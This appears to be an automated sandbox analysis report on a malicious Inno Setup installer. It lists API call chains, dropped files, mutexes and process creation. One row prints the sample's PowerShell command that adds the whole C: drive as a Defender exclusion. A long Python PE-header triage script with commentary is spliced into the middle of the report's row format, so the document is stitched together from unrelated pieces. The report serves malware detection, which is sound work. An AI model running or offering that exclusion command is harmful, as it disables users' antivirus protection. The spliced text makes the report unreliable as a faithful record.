Source: yvaKqhmD4L.tmp, 00000001.00000003.1763374438.0000000004300000.00000004.00001000.00020000.00000000.sdmp, yvaKqhmD4L.tmp, 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, update.vbc.1.dr, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vbc.6.dr; String found in binary or memory: http://ocsp.digicert.com0A
Source: yvaKqhmD4L.tmp, 00000001.00000003.1763374438.0000000004300000.00000004.00001000.00020000.00000000.sdmp, yvaKqhmD4L.tmp, 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, update.vbc.1.dr, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vbc.6.dr; String found in binary or memory: http://ocsp.digicert.com0C
Source: yvaKqhmD4L.tmp, 00000001.00000003.1763374438.0000000004300000.00000004.00001000.00020000.00000000.sdmp, yvaKqhmD4L.tmp, 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, update.vbc.1.dr, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vbc.6.dr; String found in binary or memory: http://ocsp.digicert.com0H
Source: yvaKqhmD4L.tmp, 00000001.00000003.1763374438.0000000004300000.00000004.00001000.00020000.00000000.sdmp, yvaKqhmD4L.tmp, 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, update.vbc.1.dr, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vbc.6.dr; String found in binary or memory: http://ocsp.digicert.com0I
Source: yvaKqhmD4L.tmp, 00000001.00000003.1763374438.0000000004300000.00000004.00001000.00020000.00000000.sdmp, yvaKqhmD4L.tmp, 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, update.vbc.1.dr, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vbc.6.dr; String found in binary or memory: http://ocsp.digicert.com0X
Source: yvaKqhmD4L.tmp, 00000001.00000003.1763374438.0000000004300000.00000004.00001000.00020000.00000000.sdmp, yvaKqhmD4L.tmp, 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, update.vbc.1.dr, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vbc.6.dr; String found in binary or memory: http://www.digicert.com/CPS0
Source: yvaKqhmD4L.tmp, 00000001.00000003.1763374438.0000000004300000.00000004.00001000.00020000.00000000.sdmp, yvaKqhmD4L.tmp, 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, update.vbc.1.dr, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vbc.6.dr; String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: yvaKqhmD4L.exe; String found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: yvaKqhmD4L.exe, 00000000.00000003.1675434407.0000000002CF0000.00000004.00001000.00020000.00000000.sdmp, yvaKqhmD4L.exe, 00000000.00000003.1676151340.000000007F5FB000.00000004.00001000.00020000.00000000.sdmp, yvaKqhmD4L.tmp, 00000001.00000000.1677476688.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, yvaKqhmD4L.tmp, 00000006.00000000.1765909025.0000000000A5D000.00000020.00000001.01000000.00000008.sdmp, yvaKqhmD4L.tmp.0.dr, yvaKqhmD4L.tmp.5.dr; String found in binary or memory: https://www.innosetup.com/
Source: yvaKqhmD4L.exe, 00000000.00000003.1675434407.0000000002CF0000.00000004.00001000.00020000.00000000.sdmp, yvaKqhmD4L.exe, 00000000.00000003.1676151340.000000007F5FB000.00000004.00001000.00020000.00000000.sdmp, yvaKqhmD4L.tmp, 00000001.00000000.1677476688.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, yvaKqhmD4L.tmp, 00000006.00000000.1765909025.0000000000A5D000.00000020.00000001.01000000.00000008.sdmp, yvaKqhmD4L.tmp.0.dr, yvaKqhmD4L.tmp.5.dr; String found in binary or memory: https://www.remobjects.com/ps

Operating System Destruction

Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmp; Process information set: 01 00 00 00

System Summary

Source: update.vbc.1.dr; Static PE information: section name: .aQ#
Source: update.vbc.6.dr; Static PE information: section name: .aQ#
Source: hrsw.vbc.6.dr; Static PE information: section name: .aQ#
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmp; Code function: 6_2_6C1F8810 NtSetInformationThread,OpenSCManagerA,CloseServiceHandle,OpenServiceA,CloseServiceHandle,6_2_6C1F8810
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmp; Code function: 6_2_6C073886 NtSetInformationThread,GetCurrentThread,NtSetInformationThread,6_2_6C073886
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmp; Code function: 6_2_6C1F9450 OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,NtInitiatePowerAction,6_2_6C1F9450
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmp; Code function: 6_2_6C073C62 NtSetInformationThread,GetCurrentThread,NtSetInformationThread,6_2_6C073C62
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmp; Code function: 6_2_6C073D18 NtSetInformationThread,GetCurrentThread,NtSetInformationThread,6_2_6C073D18
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmp; Code function: 6_2_6C073D62 NtSetInformationThread,GetCurrentThread,NtSetInformationThread,6_2_6C073D62
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmp; Code function: 6_2_6C0739CF NtSetInformationThread,GetCurrentThread,NtSetInformationThread,6_2_6C0739CF
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmp; Code function: 6_2_6C073A6A NtSetInformationThread,GetCurrentThread,NtSetInformationThread,6_2_6C073A6A
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmp; Code function: 6_2_6C071950: CreateFileA,DeviceIoControl,CloseHandle,6_2_6C071950
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmp; Code function: 6_2_6C074754 _strlen,CreateFileA,CreateFileA,CloseHandle,_strlen,std::ios_base::_Ios_base_dtor,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,TerminateProcess,GetCurrentProcess,TerminateProcess,_strlen,Sleep,ExitWindowsEx,Sleep,DeleteFileA,Sleep,_strlen,DeleteFileA,Sleep,_strlen,std::ios_base::_Ios_base_dtor,6_2_6C074754
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmp | Code function: 6_2_6C074754
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmp | Code function: 6_2_6C3D8D12
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmp | Code function: 6_2_6C344F0A
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmp | Code function: 6_2_6C3CB06F
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmp | Code function: 6_2_6C1F4860
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmp | Code function: 6_2_6C363881
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmp | Code function: 6_2_6C1FA133
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmp | Code function: 6_2_6C307A46
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmp | Code function: 6_2_6C37CB30
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmp | Code function: 6_2_6C259CE0
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmp | Code function: 6_2_6C2A6D50
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmp | Code function: 6_2_6C22BEA1
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmp | Code function: 6_2_6C2ACE80
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmp | Code function: 6_2_6C245EC9
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmp | Code function: 6_2_6C2A1810
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmp | Code function: 6_2_6C2BD930
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmp | Code function: 6_2_6C22B972
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmp | Code function: 6_2_6C2AC9F0
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmp | Code function: 6_2_6C2A2A50
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmp | Code function: 6_2_6C2A4AA0
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmp | Code function: 6_2_6C2B7AA0
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmp | Code function: 6_2_6C2A0AD0
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmp | Code function: 6_2_6C243B66
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmp | Code function: 6_2_6C233BCA
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmp | Code function: 6_2_6C24840A
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmp | Code function: 6_2_6C2A5580
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmp | Code function: 6_2_6C2B25C0
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmp | Code function: 6_2_6C2AC6E0
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmp | Code function: 6_2_6C2CC700
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmp | Code function: 6_2_6C22F7CF
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmp | Code function: 6_2_6C2A3020
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmp | Code function: 6_2_6C2B6750
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00D381EC
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00D0E00A
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00D781C0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00D722E0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00D88240
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00D8C3C0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00D92300
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00D804C8
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00D5E49F
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00D725F0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00D666D0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00D6A6A0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00D68650
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00D8E990
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00D6C950
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00D40943
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00D72A80
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00D4AB11
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00D76CE0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00D68C20
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00D84EA0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00D80E00
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00D7D089
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00D510AC
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00D6D1D0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00D891C0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00D75180
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00D6B180
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00D5B121
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00D81120
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00D8D2C0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00D87200
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00CF53CF
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00D8F3C0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00D553F3
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00D1B3E4
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00D7F3A0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00D854D0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00D3D496
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00D8D470
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00D67410
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00D7F420
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00D8F599
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00D81550
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00CF1572
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00D9351A
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00D6F500
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00D83530
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00D7D6A0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00D49652
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00D93601
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00CF97CA
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00D877C0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00D09766
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00D1F8E0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00D8D9E0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00D6F910
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00D0BAC9
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00D77AF0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00D43AEF
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00CF1AA1
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00D0BC92
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00D77C50
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00D6FDF0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00D75E80
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00D75F80
Source: Joe Sandbox View | Dropped File: C:\Program Files (x86)\Windows NT\hrsw.vbc 34063D8A5CC7DE10C1514FD21463D4E5A0E99CFAB7A8EE1168E84EDE8823EDFB
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Process token adjusted: Security
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmp | Code function: String function: 6C2C9F10 appears 415 times
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmp | Code function: String function: 6C22C240 appears 31 times
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: String function: 00D8FB10 appears 720 times
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: String function: 00CF1E40 appears 83 times
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: String function: 00CF28E3 appears 34 times
Source: yvaKqhmD4L.tmp.0.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: yvaKqhmD4L.tmp.5.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: yvaKqhmD4L.tmp.0.dr | Static PE information: Number of sections : 11 > 10
Source: yvaKqhmD4L.tmp.5.dr | Static PE information: Number of sections : 11 > 10
Source: yvaKqhmD4L.exe | Static PE information: Number of sections : 11 > 10
Source: yvaKqhmD4L.exe, 00000000.00000003.1676151340.000000007F8FA000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFileName 5LHPnoUW1r.exe vs yvaKqhmD4L.exe
Source: yvaKqhmD4L.exe, 00000000.00000000.1674102222.0000000000189000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFileName 5LHPnoUW1r.exe vs yvaKqhmD4L.exe
Source: yvaKqhmD4L.exe, 00000000.00000003.1675434407.0000000002E0E000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFileName 5LHPnoUW1r.exe vs yvaKqhmD4L.exe
Source: yvaKqhmD4L.exe | Binary or memory string: OriginalFileName 5LHPnoUW1r.exe vs yvaKqhmD4L.exe
Source: yvaKqhmD4L.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
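The static rows above (section count over 10, the EXECUTABLE_IMAGE and 32BIT_MACHINE characteristics, and a PE32+ x86-64 image stored in an RT_RCDATA resource) can be reproduced from the COFF header alone. The following pure-Python triage script is an added example, not code from the report or from the sample: it parses the DOS and COFF headers, reads the optional-header magic to tell PE32 from PE32+, and carves nested PE headers by validating every MZ occurrence rather than walking the resource directory (an approximation that can produce false positives and must be confirmed by hand). The sample bytes are constructed stubs, not the analysed binary.

```python
"""COFF-header triage of a PE image: section count, characteristics, machine,
PE32/PE32+ magic, and carving of embedded PE headers (for example an x86-64
payload stored as an RT_RCDATA resource inside a 32-bit installer)."""
import struct

IMAGE_FILE_EXECUTABLE_IMAGE = 0x0002
IMAGE_FILE_32BIT_MACHINE = 0x0100
IMAGE_FILE_DLL = 0x2000
MACHINES = {0x014C: "i386", 0x8664: "x86-64", 0xAA64: "ARM64"}
MAGICS = {0x10B: "PE32", 0x20B: "PE32+"}
FLAG_NAMES = {
    IMAGE_FILE_EXECUTABLE_IMAGE: "EXECUTABLE_IMAGE",
    IMAGE_FILE_32BIT_MACHINE: "32BIT_MACHINE",
    IMAGE_FILE_DLL: "DLL",
}


def parse_coff_header(data: bytes) -> dict:
    """Return machine, section count, characteristics and optional-header magic
    of the PE image starting at data[0]; raise ValueError if there is none."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("no MZ header")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    # PE signature (4) + COFF file header (20) must fit inside the buffer.
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    machine, nsect, _ts, _symtab, _nsym, opt_size, chars = struct.unpack_from(
        "<HHIIIHH", data, e_lfanew + 4)
    magic = 0
    if opt_size >= 2 and e_lfanew + 26 <= len(data):
        (magic,) = struct.unpack_from("<H", data, e_lfanew + 24)
    return {
        "machine": MACHINES.get(machine, hex(machine)),
        "number_of_sections": nsect,
        "characteristics": [name for flag, name in FLAG_NAMES.items() if chars & flag],
        "format": MAGICS.get(magic, "unknown"),
    }


def find_embedded_pe(data: bytes, start: int = 1) -> list:
    """Carve nested PE headers by validating every 'MZ' after the outer header.
    Random data containing 'MZ' plus a plausible e_lfanew can match, so treat
    hits as leads to confirm, not as proof of an embedded executable."""
    hits, off = [], data.find(b"MZ", start)
    while off != -1:
        try:
            hits.append((off, parse_coff_header(data[off:])))
        except ValueError:
            pass
        off = data.find(b"MZ", off + 1)
    return hits


def static_findings(data: bytes) -> list:
    """Emit the same three observations the report makes for one image."""
    hdr = parse_coff_header(data)
    out = []
    if hdr["number_of_sections"] > 10:
        out.append(f"Number of sections : {hdr['number_of_sections']} > 10")
    out.append(", ".join(hdr["characteristics"]))
    for off, inner in find_embedded_pe(data):
        out.append(f"embedded {inner['format']} {inner['machine']} image at offset {off:#x}")
    return out


def build_stub_pe(nsections: int, machine: int, characteristics: int, magic: int) -> bytes:
    """Constructed minimal image (DOS header, PE signature, COFF header and the
    optional-header magic) used as offline sample input; not a loadable file."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)          # e_lfanew -> right after DOS header
    coff = struct.pack("<HHIIIHH", machine, nsections, 0, 0, 0, 2, characteristics)
    return bytes(dos) + b"PE\0\0" + coff + struct.pack("<H", magic)


# Constructed sample: a 32-bit, 11-section outer image with a PE32+ x86-64
# image appended after 32 bytes of padding, mirroring the report's findings.
SAMPLE = (build_stub_pe(11, 0x014C, IMAGE_FILE_EXECUTABLE_IMAGE | IMAGE_FILE_32BIT_MACHINE, 0x10B)
          + b"\0" * 32
          + build_stub_pe(6, 0x8664, IMAGE_FILE_EXECUTABLE_IMAGE, 0x20B))

if __name__ == "__main__":
    for line in static_findings(SAMPLE):
        print(line)
```

On a real file, replace SAMPLE with the bytes read from disk; the carving pass is linear in file size and should be followed by parsing the resource directory (or extracting the resource with a PE library) to confirm that the hit is the RT_RCDATA payload rather than a stray MZ string.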
Source: tProtect.dll.12.dr | Binary string: \Device\TfSysMon
Source: tProtect.dll.12.dr | Binary string: \Device\TfKbMonPWLCache
Source: classification engine | Classification label: mal96.evad.winEXE@128/31@0/0
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmp | Code function: 6_2_6C1F9450 OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,NtInitiatePowerAction
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00CF9313 _isatty,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00D03D66 __EH_prolog,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00CF9252 DeviceIoControl,GetModuleHandleW,GetProcAddress,GetDiskFreeSpaceW
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmp | Code function: 6_2_6C1F8930 CreateToolhelp32Snapshot,CloseHandle,Process32FirstW,Process32NextW
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmp | File created: C:\Program Files (x86)\Windows NT\is-LQQ5K.tmp
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:1196:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:4304:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:3548:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:1020:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:5580:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:980:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:6688:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:5500:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:928:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:3336:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:1608:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:5064:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:6624:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:6460:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:5480:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:6528:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:6164:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6016:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:908:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:2476:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:6544:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:6572:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:6576:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:6016:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:2996:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6624:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:7028:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:3384:120:WilError_03
Source: C:\Users\user\Desktop\yvaKqhmD4L.exe | File created: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp
Source: C:\Users\user\Desktop\yvaKqhmD4L.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales (4 occurrences)
Source: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmp | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales (2 occurrences)
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmp | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales (2 occurrences)
Source: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmp | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\yvaKqhmD4L.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmp | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization
Source: yvaKqhmD4L.exe | Virustotal: Detection: 11%
Source: yvaKqhmD4L.exe | String found in binary or memory: /LOADINF="filename"
Source: C:\Users\user\Desktop\yvaKqhmD4L.exe | File read: C:\Users\user\Desktop\yvaKqhmD4L.exe
Source: unknown | Process created: C:\Users\user\Desktop\yvaKqhmD4L.exe "C:\Users\user\Desktop\yvaKqhmD4L.exe"
Source: C:\Users\user\Desktop\yvaKqhmD4L.exe | Process created: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmp "C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmp" /SL5="$20432,5790671,845824,C:\Users\user\Desktop\yvaKqhmD4L.exe"
Source: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmp | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
